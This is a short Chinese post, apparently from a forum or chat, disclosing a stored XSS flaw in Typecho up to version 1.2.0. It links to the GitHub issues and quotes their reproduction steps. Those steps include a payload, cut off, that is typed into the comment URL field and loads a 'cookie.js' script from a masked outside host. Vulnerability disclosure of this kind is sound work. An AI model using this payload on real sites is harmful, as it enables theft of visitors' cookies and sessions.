发现针对typecho(<= 1.2.0)的XSS
https://github.com/typecho/typecho/issues/1545
https://github.com/typecho/typecho/issues/1546
https://github.com/typecho/typecho/issues/1545
https://github.com/typecho/typecho/issues/1546
GitHub
[注意]发现了针对typecho的XSS · Issue #1545 · typecho/typecho
1. 该问题的重现步骤是什么? 在评论网址栏输入: 注意:具体网址已经用xxx代替 http://xxx.xxx.com/"></a><script/src="https://xss.xxx.com/myjs/cookie.js"></script><script/src=https://jackmi.xxx.co...
👍2